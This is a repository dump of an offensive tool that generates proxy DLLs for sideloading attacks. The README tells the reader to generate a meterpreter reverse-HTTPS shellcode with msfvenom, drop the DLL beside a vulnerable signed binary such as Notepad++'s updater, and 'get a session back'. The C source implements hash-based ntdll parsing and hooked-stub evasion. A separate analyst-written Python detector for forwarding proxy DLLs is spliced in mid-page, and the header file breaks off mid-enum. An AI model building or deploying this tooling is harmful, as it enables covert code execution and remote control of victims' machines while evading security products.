├── .gitignore
├── LICENSE
├── README.md
├── SideLoadingDLL
│   ├── .vs
│   │   └── SideLoadingDLL
│   │       ├── FileContentIndex
│   │       │   ├── 73454454-f1d4-4963-b583-a42c666a7379.vsidx
│   │       │   └── read.lock
│   │       └── v17
│   │           ├── .suo
│   │           ├── Browse.VC.db
│   │           └── ipch
│   │               └── AutoPCH
│   │                   ├── 7d95276ac630db28
│   │                   │   └── RECYCLEGATE.ipch
│   │                   └── fbba1bce1403490f
│   │                       └── DLLMAIN.ipch
│   ├── SideLoadingDLL.sln
│   ├── SideLoadingDLL
│   │   ├── Defines.h
│   │   ├── GateTrampolin.asm
│   │   ├── RecycleGate.c
│   │   ├── RecycleGate.h
│   │   ├── SideLoadingDLL.vcxproj
│   │   ├── SideLoadingDLL.vcxproj.filters
│   │   ├── SideLoadingDLL.vcxproj.user
│   │   ├── dllmain.c
│   │   ├── framework.h
│   │   └── x64
│   │       └── Release
│   │           ├── GateTrampolin.obj
│   │           ├── RecycleGate.obj
│   │           ├── SideLoadingDLL.Build.CppClean.log
│   │           ├── SideLoadingDLL.dll.recipe
│   │           ├── SideLoadingDLL.iobj
│   │           ├── SideLoadingDLL.ipdb
│   │           ├── SideLoadingDLL.log
│   │           ├── SideLoadingDLL.tlog
│   │           │   ├── CL.command.1.tlog
│   │           │   ├── CL.read.1.tlog
│   │           │   ├── CL.write.1.tlog
│   │           │   ├── Masm.read.1u.tlog
│   │           │   ├── Masm.write.1u.tlog
│   │           │   ├── SideLoadingDLL.lastbuildstate
│   │           │   ├── link.command.1.tlog
│   │           │   ├── link.read.1.tlog
│   │           │   ├── link.write.1.tlog
│   │           │   └── link.write.2u.tlog
│   │           ├── SideLoadingDLL.vcxproj.FileListAbsolute.txt
│   │           ├── dllmain.obj
│   │           ├── userenv-syscalls.Build.CppClean.log
│   │           ├── userenv-syscalls.dll.recipe
│   │           ├── userenv-syscalls.log
│   │           ├── userenv-syscalls.tlog
│   │           │   ├── CL.command.1.tlog
│   │           │   ├── CL.read.1.tlog
│   │           │   ├── CL.write.1.tlog
│   │           │   ├── Masm.read.1u.tlog
│   │           │   ├── Masm.write.1u.tlog
│   │           │   ├── link.command.1.tlog
│   │           │   ├── link.read.1.tlog
│   │           │   ├── link.write.1.tlog
│   │           │   ├── userenv-syscalls.lastbuildstate
│   │           │   └── userenv-syscalls.write.1u.tlog
│   │           ├── userenv-syscalls.vcxproj.FileListAbsolute.txt
│   │           └── vc143.pdb
│   └── x64
│       └── Release
│           ├── SideLoadingDLL.dll
│           ├── SideLoadingDLL.exp
│           ├── SideLoadingDLL.lib
│           └── SideLoadingDLL.pdb
├── demo
│   └── screen-capture.gif
├── get_exports.py
└── make.py
/.gitignore:
--------------------------------------------------------------------------------
.vs/*
*.tlog
*.obj
*.log
*.ipdb
*.recipe
*.iobj
*.vsidx
*.db
*.ipch

--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
MIT License

Copyright (c) 2022 Maor Sabag

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# SideLoadingDLL

Python script to generate "proxy" DLL files that are loaded unsafely by binaries at runtime, which makes it easy to perform a DLL sideloading or hijacking attack.
This implementation makes sure that all system calls still go through ntdll.dll, so the DLL never executes a direct syscall instruction of its own.

See the articles below for more details:
https://flangvik.com/privesc/windows/bypass/2019/06/25/Sideload-like-your-an-APT.html
https://flangvik.com/2019/07/24/Bypassing-AV-DLL-Side-Loading.html

The demo uses GUP.exe, the signed updater that ships with Notepad++, loading a malicious ncrypt.dll through sideloading:

Sideloading ncrypt.dll (meterpreter session)
![Sideloading ncrypt.dll](demo/screen-capture.gif)

## Dependencies
- x64 Native Tools Command Prompt for VS
- Python3

## Usage
- Find a binary that is vulnerable to sideloading/DLL hijacking
- Create the shellcode (msfvenom -p windows/x64/meterpreter_reverse_https LHOST=eth0 LPORT=443 -f raw -o shellcode.bin)
- Run make.py with the arguments it needs
- Copy the files from the Output directory next to the vulnerable program and make sure the target process is running
- Run the program and get a session back!!

## Demo
- You can find the full demo in this [link](https://drive.google.com/file/d/1CR4uV-GGxm8kNZYWHtpSrjMGEgoj1Zr4/view).

## Credits
- [Sektor7's RTO Malware Essential Course](https://institute.sektor7.net/red-team-operator-malware-development-essentials)
- [thefLink](https://github.com/thefLink)'s [RecycledGate](https://github.com/thefLink/RecycledGate)

--------------------------------------------------------------------------------
/SideLoadingDLL/.vs/SideLoadingDLL/FileContentIndex/73454454-f1d4-4963-b583-a42c666a7379.vsidx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MaorSabag/SideLoadingDLL/3fc4067bac82d19f269fa55ec247c8a1266b589a/SideLoadingDLL/.vs/SideLoadingDLL/FileContentIndex/73454454-f1d4-4963-b583-a42c666a7379.vsidx
--------------------------------------------------------------------------------
/SideLoadingDLL/.vs/SideLoadingDLL/FileContentIndex/read.lock:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MaorSabag/SideLoadingDLL/3fc4067bac82d19f269fa55ec247c8a1266b589a/SideLoadingDLL/.vs/SideLoadingDLL/FileContentIndex/read.lock
--------------------------------------------------------------------------------
/SideLoadingDLL/.vs/SideLoadingDLL/v17/.suo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MaorSabag/SideLoadingDLL/3fc4067bac82d19f269fa55ec247c8a1266b589a/SideLoadingDLL/.vs/SideLoadingDLL/v17/.suo
--------------------------------------------------------------------------------
/SideLoadingDLL/.vs/SideLoadingDLL/v17/Browse.VC.db:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MaorSabag/SideLoadingDLL/3fc4067bac82d19f269fa55ec247c8a1266b589a/SideLoadingDLL/.vs/SideLoadingDLL/v17/Browse.VC.db
--------------------------------------------------------------------------------
/SideLoadingDLL/.vs/SideLoadingDLL/v17/ipch/AutoPCH/7d95276ac630db28/RECYCLEGATE.ipch:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MaorSabag/SideLoadingDLL/3fc4067bac82d19f269fa55ec247c8a1266b589a/SideLoadingDLL/.vs/SideLoadingDLL/v17/ipch/AutoPCH/7d95276ac630db28/RECYCLEGATE.ipch
--------------------------------------------------------------------------------
/SideLoadingDLL/.vs/SideLoadingDLL/v17/ipch/AutoPCH/fbba1bce1403490f/DLLMAIN.ipch:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MaorSabag/SideLoadingDLL/3fc4067bac82d19f269fa55ec247c8a1266b589a/SideLoadingDLL/.vs/SideLoadingDLL/v17/ipch/AutoPCH/fbba1bce1403490f/DLLMAIN.ipch
--------------------------------------------------------------------------------
/SideLoadingDLL/SideLoadingDLL.sln:
--------------------------------------------------------------------------------

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 17
VisualStudioVersion = 17.0.32014.148
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "SideLoadingDLL", "SideLoadingDLL\SideLoadingDLL.vcxproj", "{68E703A8-AFB7-4E92-9841-C085C923AF06}"
EndProject
Global
	GlobalSection(SolutionConfigurationPlatforms) = preSolution
		Debug|x64 = Debug|x64
		Debug|x86 = Debug|x86
		Release|x64 = Release|x64
		Release|x86 = Release|x86
	EndGlobalSection
	GlobalSection(ProjectConfigurationPlatforms) = postSolution
		{68E703A8-AFB7-4E92-9841-C085C923AF06}.Debug|x64.ActiveCfg = Debug|x64
		{68E703A8-AFB7-4E92-9841-C085C923AF06}.Debug|x64.Build.0 = Debug|x64
		{68E703A8-AFB7-4E92-9841-C085C923AF06}.Debug|x86.ActiveCfg = Debug|Win32
		{68E703A8-AFB7-4E92-9841-C085C923AF06}.Debug|x86.Build.0 = Debug|Win32
		{68E703A8-AFB7-4E92-9841-C085C923AF06}.Release|x64.ActiveCfg = Release|x64
		{68E703A8-AFB7-4E92-9841-C085C923AF06}.Release|x64.Build.0 = Release|x64
		{68E703A8-AFB7-4E92-9841-C085C923AF06}.Release|x86.ActiveCfg = Release|Win32
		{68E703A8-AFB7-4E92-9841-C085C923AF06}.Release|x86.Build.0 = Release|Win32
	EndGlobalSection
	GlobalSection(SolutionProperties) = preSolution
		HideSolutionNode = FALSE
	EndGlobalSection
	GlobalSection(ExtensibilityGlobals) = postSolution
		SolutionGuid = {EC62C3B2-4F33-4AE9-B256-56694335F7F1}
	EndGlobalSection
EndGlobal

--------------------------------------------------------------------------------
/SideLoadingDLL/SideLoadingDLL/Defines.h:
--------------------------------------------------------------------------------
#pragma once
#include "windows.h"

typedef VOID(KNORMAL_ROUTINE) (
    IN PVOID NormalContext,
    IN PVOID SystemArgument1,
    IN PVOID SystemArgument2);

typedef KNORMAL_ROUTINE* PKNORMAL_ROUTINE;

#define InitializeObjectAttributes( p, n, a, r, s ) { \
    (p)->Length = sizeof( OBJECT_ATTRIBUTES ); \
    (p)->RootDirectory = r; \
    (p)->Attributes = a; \
    (p)->ObjectName = n; \
    (p)->SecurityDescriptor = s; \
    (p)->SecurityQualityOfService = NULL; \
}
--------------------------------------------------------------------------------
/SideLoadingDLL/SideLoadingDLL/GateTrampolin.asm:
--------------------------------------------------------------------------------
.code

PrepareSyscall PROC

    xor r11, r11
    xor r10, r10
    mov r11, rcx
    mov r10, rdx
    ret

PrepareSyscall ENDP

DoSyscall PROC

    push r10
    xor rax, rax
    mov r10, rcx
    mov eax, r11d
    ret

DoSyscall ENDP

end

--------------------------------------------------------------------------------
/SideLoadingDLL/SideLoadingDLL/RecycleGate.c:
--------------------------------------------------------------------------------
#include "RecycleGate.h"

DWORD getSyscall(DWORD dwCryptedHash, Syscall* pSyscall) {

    PIMAGE_DOS_HEADER pDosHdr = NULL;
    PIMAGE_NT_HEADERS pNtHdrs = NULL;
    PIMAGE_EXPORT_DIRECTORY pExportDir = NULL;

    PVOID pGate = NULL, pNtdllBase = NULL, pStub = NULL;
    PDWORD pdwAddrOfNames = NULL, pdwAddrOfFunctions = NULL;
    PWORD pwAddrOfNameOrdinales = NULL;
    DWORD dwSyscallNr = 0, dwSuccess = FAIL;
    WORD wIdxStub = 0, wIdxfName = 0;
    PCHAR pFunctionName = NULL;
    BOOL bHooked = FALSE;

    pNtdllBase = findNtDll();
    if (pNtdllBase == NULL)
        goto exit;

    pDosHdr = (PIMAGE_DOS_HEADER)pNtdllBase;
    pNtHdrs = (PIMAGE_NT_HEADERS)((PBYTE)pNtdllBase + pDosHdr->e_lfanew);
    pExportDir = (PIMAGE_EXPORT_DIRECTORY)((PBYTE)pNtdllBase + pNtHdrs->OptionalHeader.DataDirectory[0].VirtualAddress);

    pdwAddrOfFunctions = (PDWORD)((PBYTE)pNtdllBase + pExportDir->AddressOfFunctions);
    pdwAddrOfNames = (PDWORD)((PBYTE)pNtdllBase + pExportDir->AddressOfNames);
    pwAddrOfNameOrdinales = (PWORD)((PBYTE)pNtdllBase + pExportDir->AddressOfNameOrdinals);

    for (wIdxfName = 0; wIdxfName < pExportDir->NumberOfNames; wIdxfName++) {

        pFunctionName = (PCHAR)((PBYTE)pNtdllBase + pdwAddrOfNames[wIdxfName]);
        pStub = (PVOID)((PBYTE)pNtdllBase + pdwAddrOfFunctions[pwAddrOfNameOrdinales[wIdxfName]]);

        if (djb2(pFunctionName) == xor_hash(dwCryptedHash))
            break;

    }

    if (pStub == NULL)
        goto exit;

    for (wIdxStub = 0; wIdxStub < SYS_STUB_SIZE; wIdxStub++) {

        if (*((PBYTE)pStub + wIdxStub) == 0xe9) { // This syscall stub is hooked
            bHooked = TRUE;
            break;
        }

        if (*((PBYTE)pStub + wIdxStub) == 0xc3) // Too far
            goto exit;

        if (*((PBYTE)pStub + wIdxStub) == 0x4c && *((PBYTE)pStub + wIdxStub + 1) == 0x8b && *((PBYTE)pStub + wIdxStub + 2) == 0xd1 &&
            *((PBYTE)pStub + wIdxStub + 3) == 0xb8 && *((PBYTE)pStub + wIdxStub + 6) == 0x00 && *((PBYTE)pStub + wIdxStub + 7) == 0x00) {

            BYTE low = *((PBYTE)pStub + 4 + wIdxStub);
            BYTE high = *((PBYTE)pStub + 5 + wIdxStub);

            dwSyscallNr = (high << 8) | low;

            break;

        }
    }

    if (bHooked) { // Check syscalls around our hooked syscall

        for (wIdxfName = 1; wIdxfName <= pExportDir->NumberOfFunctions; wIdxfName++) {
            if ((PBYTE)pStub + wIdxfName * DOWN < ((PBYTE)pNtdllBase + pdwAddrOfFunctions[pwAddrOfNameOrdinales[pExportDir->NumberOfFunctions - 1]])) {
                if (
                    *((PBYTE)pStub + wIdxfName * DOWN) == 0x4c
                    && *((PBYTE)pStub + 1 + wIdxfName * DOWN) == 0x8b
                    && *((PBYTE)pStub + 2 + wIdxfName * DOWN) == 0xd1
                    && *((PBYTE)pStub + 3 + wIdxfName * DOWN) == 0xb8
                    && *((PBYTE)pStub + 6 + wIdxfName * DOWN) == 0x00
                    && *((PBYTE)pStub + 7 + wIdxfName * DOWN) == 0x00) {

                    BYTE high = *((PBYTE)pStub + 5 + wIdxfName * DOWN);
                    BYTE low = *((PBYTE)pStub + 4 + wIdxfName * DOWN);
                    dwSyscallNr = (high << 8) | low - wIdxfName;

                    pStub = (PVOID)((PBYTE)pStub + wIdxfName * DOWN);

                    break;

                }
            }

            if ((PBYTE)pStub + wIdxfName * UP > ((PBYTE)pNtdllBase + pdwAddrOfFunctions[pwAddrOfNameOrdinales[0]])) {

                if (*((PBYTE)pStub + wIdxfName * UP) == 0x4c
                    && *((PBYTE)pStub + 1 + wIdxfName * UP) == 0x8b
                    && *((PBYTE)pStub + 2 + wIdxfName * UP) == 0xd1
                    && *((PBYTE)pStub + 3 + wIdxfName * UP) == 0xb8
                    && *((PBYTE)pStub + 6 + wIdxfName * UP) == 0x00
                    && *((PBYTE)pStub + 7 + wIdxfName * UP) == 0x00) {

                    BYTE high = *((PBYTE)pStub + 5 + wIdxfName * UP);
                    BYTE low = *((PBYTE)pStub + 4 + wIdxfName * UP);
                    dwSyscallNr = (high << 8) | low + wIdxfName;

                    pStub = (PVOID)((PBYTE)pStub + wIdxfName * UP);

                    break;

                }
            }
        }

    }

    if (pStub && dwSyscallNr) { // Last step: Search for syscall ; ret to use directly
        for (wIdxStub = 0; wIdxStub < SYS_STUB_SIZE; wIdxStub++) {
            if (*((PBYTE)pStub + wIdxStub) == 0x0f && *((PBYTE)pStub + wIdxStub + 1) == 0x05 && *((PBYTE)pStub + wIdxStub + 2) == 0xc3) { // syscall; ret - sequence?
                pGate = (LPVOID)((PBYTE)pStub + wIdxStub);
                break;
            }
        }
    }

    if (pGate == NULL || dwSyscallNr == 0x00)
        goto exit;

    pSyscall->pRecycledGate = pGate;
    pSyscall->dwSyscallNr = dwSyscallNr;

    dwSuccess = SUCCESS;

exit:

    return dwSuccess;

}

PVOID findNtDll(void) {

    PPEB pPeb = NULL;
    PPEB_LDR_DATA pLdrData = NULL;
    PLDR_DATA_TABLE_ENTRY pModuleEntry = NULL, pModuleStart = NULL;
    PUNICODE_STR pDllName = NULL;

    PVOID pNtdllBase = NULL;

    pPeb = (PPEB)__readgsqword(0x60);
    pLdrData = pPeb->pLdr;
    pModuleEntry = pModuleStart = (PLDR_DATA_TABLE_ENTRY)pLdrData->InMemoryOrderModuleList.Flink;

    do {

        pDllName = &pModuleEntry->BaseDllName;

        if (pDllName->pBuffer == NULL)
            return NULL;

        if (djb2_unicode(toLower(pDllName->pBuffer)) == xor_hash(0x6391f6a9)) {
            pNtdllBase = (PVOID)pModuleEntry->DllBase;
            break;
        }

        pModuleEntry = (PLDR_DATA_TABLE_ENTRY)pModuleEntry->InMemoryOrderModuleList.Flink;

    } while (pModuleEntry != pModuleStart);

    return pNtdllBase;

}

unsigned long
djb2_unicode(const wchar_t* str)
{

    unsigned long hash = 5381;
    DWORD val;

    while (*str != 0) {
        val = (DWORD)*str++;
        hash = ((hash << 5) + hash) + val;
    }

    return hash;

}

unsigned long
djb2(unsigned char* str)
{
    unsigned long hash = 5381;
    int c;

    while ((c = *str++))
        hash = ((hash << 5) + hash) + c;

    return hash;
}

WCHAR*
toLower(WCHAR* str)
{

    WCHAR* start = str;

    while (*str) {

        if (*str <= L'Z' && *str >= 'A') {
            *str += 32;
        }

        str += 1;

    }

    return start;

}

unsigned long
xor_hash(unsigned long hash) {
    return hash ^ HASH_KEY;
}

int my_strcmp(const char* p1, const char* p2) {
    const unsigned char* s1 = (const unsigned char*)p1;
    const unsigned char* s2 = (const unsigned char*)p2;
    unsigned char c1, c2;
    do {
        c1 = (unsigned char)*s1++;
        c2 = (unsigned char)*s2++;
        if (c1 == '\0') {
            return c1 - c2;
        }
    } while (c1 == c2);
    return c1 - c2;
}

--------------------------------------------------------------------------------
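Two passages on this page lean on the PE export table: the README's "proxy" DLLs, which re-export a legitimate module's functions as forwarders to a renamed copy, and `getSyscall()` above, which walks ntdll's export directory (names, then name ordinals, then function RVAs) to locate its stubs. The Python below is an added analyst-side example and not code from this repository. It constructs a minimal PE32+ image in memory, walks its export directory with the same name/ordinal/function indirection, and reports which exports are forwarders and which module they point at. A DLL that sits in an application directory under a system DLL's name and forwards nearly all of its exports to another module is the artifact a generator like this leaves behind, which is the check a triage script runs over a suspicious app-local DLL. The constructed image is laid out so that RVAs equal file offsets; for a real on-disk DLL, RVAs must first be translated through the section table (or the file parsed with `pefile`). All names in the sample (`sample.dll`, `orig_sample`, `RealFunction`, `ForwardedFunction`) are constructed for the demonstration.

```python
import struct

PE32PLUS_MAGIC = 0x20B


def put_cstr(img, off, text):
    """Write a NUL-terminated ASCII string into the constructed image."""
    data = text.encode("ascii") + b"\0"
    img[off:off + len(data)] = data


def read_cstr(img, off):
    """Read a NUL-terminated ASCII string at an image offset."""
    end = img.index(b"\0", off)
    return img[off:end].decode("ascii")


def build_sample_image():
    """Constructed minimal PE32+ image (not a real DLL) whose export table holds one
    forwarded export and one real one. RVAs equal offsets, so no section mapping is needed."""
    img = bytearray(0x400)
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x40)                      # e_lfanew
    nt = 0x40
    img[nt:nt + 4] = b"PE\0\0"
    # IMAGE_FILE_HEADER: AMD64, 1 section, no symbols, 240-byte optional header, DLL flag set
    struct.pack_into("<HHIIIHH", img, nt + 4, 0x8664, 1, 0, 0, 0, 240, 0x2022)
    opt = nt + 24
    struct.pack_into("<H", img, opt, PE32PLUS_MAGIC)
    struct.pack_into("<I", img, opt + 108, 16)                   # NumberOfRvaAndSizes
    exp_rva, exp_size = 0x200, 0x100
    struct.pack_into("<II", img, opt + 112, exp_rva, exp_size)   # DataDirectory[EXPORT]
    put_cstr(img, 0x240, "sample.dll")
    put_cstr(img, 0x250, "ForwardedFunction")
    put_cstr(img, 0x270, "RealFunction")
    put_cstr(img, 0x280, "orig_sample.ForwardedFunction")        # forwarder string "Module.Function"
    img[0x300] = 0xC3                                            # body of RealFunction: ret
    # IMAGE_EXPORT_DIRECTORY: Name, Base=1, 2 functions, 2 names, then the three table RVAs
    struct.pack_into("<IIHHIIIIIII", img, exp_rva, 0, 0, 0, 0, 0x240, 1, 2, 2, 0x228, 0x230, 0x238)
    struct.pack_into("<II", img, 0x228, 0x280, 0x300)   # AddressOfFunctions, indexed by ordinal-Base
    struct.pack_into("<II", img, 0x230, 0x250, 0x270)   # AddressOfNames, sorted as the loader expects
    struct.pack_into("<HH", img, 0x238, 0, 1)           # AddressOfNameOrdinals
    return bytes(img)


def parse_exports(img):
    """Walk the export directory the way the loader (and getSyscall) does:
    name[i] -> ordinal[i] -> function[ordinal]. A forwarder is recognised by its
    function 'address' landing inside the export directory itself."""
    if img[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", img, 0x3C)[0]
    if img[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    opt = e_lfanew + 24
    magic = struct.unpack_from("<H", img, opt)[0]
    dir_off = opt + (112 if magic == PE32PLUS_MAGIC else 96)   # DataDirectory start, PE32+ vs PE32
    exp_rva, exp_size = struct.unpack_from("<II", img, dir_off)
    if exp_rva == 0:
        return {}
    n_funcs, n_names, funcs, names, ords = struct.unpack_from("<IIIII", img, exp_rva + 20)
    exports = {}
    for i in range(n_names):
        name_rva = struct.unpack_from("<I", img, names + 4 * i)[0]
        ordinal = struct.unpack_from("<H", img, ords + 2 * i)[0]
        if ordinal >= n_funcs:
            raise ValueError("name ordinal out of range")
        target = struct.unpack_from("<I", img, funcs + 4 * ordinal)[0]
        name = read_cstr(img, name_rva)
        if exp_rva <= target < exp_rva + exp_size:
            exports[name] = ("forwarder", read_cstr(img, target))
        else:
            exports[name] = ("code", target)
    return exports


def proxy_forward_targets(img):
    """Group forwarded exports by the module they point at. A DLL carrying a system DLL's
    name whose exports almost all forward to a renamed copy is the footprint of a generated
    proxy DLL and deserves a closer look."""
    targets = {}
    for name, (kind, value) in parse_exports(img).items():
        if kind == "forwarder":
            module = value.split(".", 1)[0].lower()
            targets.setdefault(module, []).append(name)
    return targets


if __name__ == "__main__":
    image = build_sample_image()
    for name, (kind, value) in parse_exports(image).items():
        print(f"{name:20} {kind:9} {value if kind == 'forwarder' else hex(value)}")
    print("forwarded to:", proxy_forward_targets(image))
```

Run stand-alone it lists `ForwardedFunction` as a forwarder to `orig_sample.ForwardedFunction` and `RealFunction` as code at RVA 0x300. The forwarder test (target RVA inside the export directory's own range) is the same rule the Windows loader applies, so it holds for real DLLs once RVAs are mapped correctly.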
/SideLoadingDLL/SideLoadingDLL/RecycleGate.h:
--------------------------------------------------------------------------------
#pragma once

#include "windows.h"

#define FAIL 0
#define SUCCESS 1

#define HASH_KEY 0x41424344
#define SYS_STUB_SIZE 32

#define UP -32
#define DOWN 32

#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)

typedef struct {

    DWORD dwSyscallNr;
    PVOID pRecycledGate;

} Syscall;

typedef struct _UNICODE_STR {
    USHORT Length;
    USHORT MaximumLength;
    PWSTR pBuffer;
} UNICODE_STR, * PUNICODE_STR;

typedef struct _OBJECT_ATTRIBUTES {
    ULONG Length;
    HANDLE RootDirectory;
    PUNICODE_STR ObjectName;
    ULONG Attributes;
    PVOID SecurityDescriptor;
    PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;

typedef struct _PEB_LDR_DATA
{
    DWORD dwLength;
    DWORD dwInitialized;
    LPVOID lpSsHandle;
    LIST_ENTRY InLoadOrderModuleList;
    LIST_ENTRY InMemoryOrderModuleList;
    LIST_ENTRY InInitializationOrderModuleList;
    LPVOID lpEntryInProgress;
} PEB_LDR_DATA, * PPEB_LDR_DATA;

typedef struct _LDR_DATA_TABLE_ENTRY
{
    LIST_ENTRY InMemoryOrderModuleList;
    LIST_ENTRY InInitializationOrderModuleList;
    PVOID DllBase;
    PVOID EntryPoint;
    ULONG SizeOfImage;
    UNICODE_STR FullDllName;
    UNICODE_STR BaseDllName;
    ULONG Flags;
    SHORT LoadCount;
    SHORT TlsIndex;
    LIST_ENTRY HashTableEntry;
    ULONG TimeDateStamp;
} LDR_DATA_TABLE_ENTRY, * PLDR_DATA_TABLE_ENTRY;

typedef struct _PEB_FREE_BLOCK
{
    struct _PEB_FREE_BLOCK* pNext;
    DWORD dwSize;
} PEB_FREE_BLOCK, * PPEB_FREE_BLOCK;

typedef struct _PEB
{
    BYTE bInheritedAddressSpace;
    BYTE bReadImageFileExecOptions;
    BYTE bBeingDebugged;
    BYTE bSpareBool;
    LPVOID lpMutant;
    LPVOID lpImageBaseAddress;
    PPEB_LDR_DATA pLdr;
    LPVOID lpProcessParameters;
    LPVOID lpSubSystemData;
    LPVOID lpProcessHeap;
    PRTL_CRITICAL_SECTION pFastPebLock;
    LPVOID lpFastPebLockRoutine;
    LPVOID lpFastPebUnlockRoutine;
    DWORD dwEnvironmentUpdateCount;
    LPVOID lpKernelCallbackTable;
    DWORD dwSystemReserved;
    DWORD dwAtlThunkSListPtr32;
    PPEB_FREE_BLOCK pFreeList;
    DWORD dwTlsExpansionCounter;
    LPVOID lpTlsBitmap;
    DWORD dwTlsBitmapBits[2];
    LPVOID lpReadOnlySharedMemoryBase;
    LPVOID lpReadOnlySharedMemoryHeap;
    LPVOID lpReadOnlyStaticServerData;
    LPVOID lpAnsiCodePageData;
    LPVOID lpOemCodePageData;
    LPVOID lpUnicodeCaseTableData;
    DWORD dwNumberOfProcessors;
    DWORD dwNtGlobalFlag;
    LARGE_INTEGER liCriticalSectionTimeout;
    DWORD dwHeapSegmentReserve;
    DWORD dwHeapSegmentCommit;
    DWORD dwHeapDeCommitTotalFreeThreshold;
    DWORD dwHeapDeCommitFreeBlockThreshold;
    DWORD dwNumberOfHeaps;
    DWORD dwMaximumNumberOfHeaps;
    LPVOID lpProcessHeaps;
    LPVOID lpGdiSharedHandleTable;
    LPVOID lpProcessStarterHelper;
    DWORD dwGdiDCAttributeList;
    LPVOID lpLoaderLock;
    DWORD dwOSMajorVersion;
    DWORD dwOSMinorVersion;
    WORD wOSBuildNumber;
    WORD wOSCSDVersion;
    DWORD dwOSPlatformId;
    DWORD dwImageSubsystem;
    DWORD dwImageSubsystemMajorVersion;
    DWORD dwImageSubsystemMinorVersion;
    DWORD dwImageProcessAffinityMask;
    DWORD dwGdiHandleBuffer[34];
    LPVOID lpPostProcessInitRoutine;
    LPVOID lpTlsExpansionBitmap;
    DWORD dwTlsExpansionBitmapBits[32];
    DWORD dwSessionId;
    ULARGE_INTEGER liAppCompatFlags;
    ULARGE_INTEGER liAppCompatFlagsUser;
    LPVOID lppShimData;
    LPVOID lpAppCompatInfo;
    UNICODE_STR usCSDVersion;
    LPVOID lpActivationContextData;
    LPVOID lpProcessAssemblyStorageMap;
    LPVOID lpSystemDefaultActivationContextData;
    LPVOID lpSystemAssemblyStorageMap;
    DWORD dwMinimumStackCommit;
} PEB, * PPEB;

typedef struct _UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PWSTR Buffer;
} UNICODE_STRING, * PUNICODE_STRING;

typedef enum _SECTION_INHERIT {
    ViewShare = 1,
    ViewUnmap = 2
} SECTION_INHERIT, * PSECTION_INHERIT;

typedef struct _SYSTEM_PROCESS_INFO
{
    ULONG NextEntryOffset;
    ULONG NumberOfThreads;
    LARGE_INTEGER Reserved[3];
    LARGE_INTEGER CreateTime;
    LARGE_INTEGER UserTime;
    LARGE_INTEGER KernelTime;
    UNICODE_STRING ImageName;
    ULONG BasePriority;
    HANDLE ProcessId;
    HANDLE InheritedFromProcessId;
} SYSTEM_PROCESS_INFO, * PSYSTEM_PROCESS_INFO;

typedef HMODULE(WINAPI* LoadLibraryA_t)(
    LPCSTR lpLibFileName
);

typedef struct _SYSTEM_HANDLE
{
    ULONG ProcessId;
    BYTE ObjectTypeNumber;
    BYTE Flags;
    USHORT Handle;
    PVOID Object;
    ACCESS_MASK GrantedAccess;
} SYSTEM_HANDLE, * PSYSTEM_HANDLE;

typedef struct _SYSTEM_HANDLE_INFORMATION
{
    ULONG HandleCount;
    SYSTEM_HANDLE Handles[1];
} SYSTEM_HANDLE_INFORMATION, * PSYSTEM_HANDLE_INFORMATION;

typedef enum _POOL_TYPE
{
    NonPagedPool,
    PagedPool,
    NonPagedPoolMustSucceed,
    DontUseThisType,
    NonPagedPoolCacheAligned,
    PagedPoolCacheAligned,
    NonPagedPoolCacheAlignedMustS
} POOL_TYPE, * PPOOL_TYPE;

typedef enum _SYSTEM_INFORMATION_CLASS
{
    SystemBasicInformation = 0x0,
    SystemProcessorInformation = 0x1,
    SystemPerformanceInformation = 0x2,
    SystemTimeOfDayInformation = 0x3,
    SystemPathInformation = 0x4,
    SystemProcessInformation = 0x5,
    SystemCallCountInformation = 0x6,
    SystemDeviceInformation = 0x7,
    SystemProcessorPerformanceInformation = 0x8,
    SystemFlagsInformation = 0x9,
    SystemCallTimeInformation = 0xa,
    SystemModuleInformation = 0xb,
    SystemLocksInformation = 0xc,
    SystemStackTraceInformation = 0xd,
    SystemPagedPoolInformation = 0xe,
    SystemNonPagedPoolInformation = 0xf,
    SystemHandleInformation = 0x10,
    SystemObjectInformation = 0x11,
    SystemPageFileInformation = 0x12,
    SystemVdmInstemulInformation = 0x13,
    SystemVdmBopInformation = 0x14,
    SystemFileCacheInformation = 0x15,
    SystemPoolTagInformation = 0x16,
    SystemInterruptInformation = 0x17,
    SystemDpcBehaviorInformation = 0x18,
    SystemFullMemoryInformation = 0x19,
    SystemLoadGdiDriverInformation = 0x1a,
    SystemUnloadGdiDriverInformation = 0x1b,
    SystemTimeAdjustmentInformation = 0x1c,
    SystemSummaryMemoryInformation = 0x1d,
    SystemMirrorMemoryInformation = 0x1e,
    SystemPerformanceTraceInformation = 0x1f,
    SystemObsolete0 = 0x20,
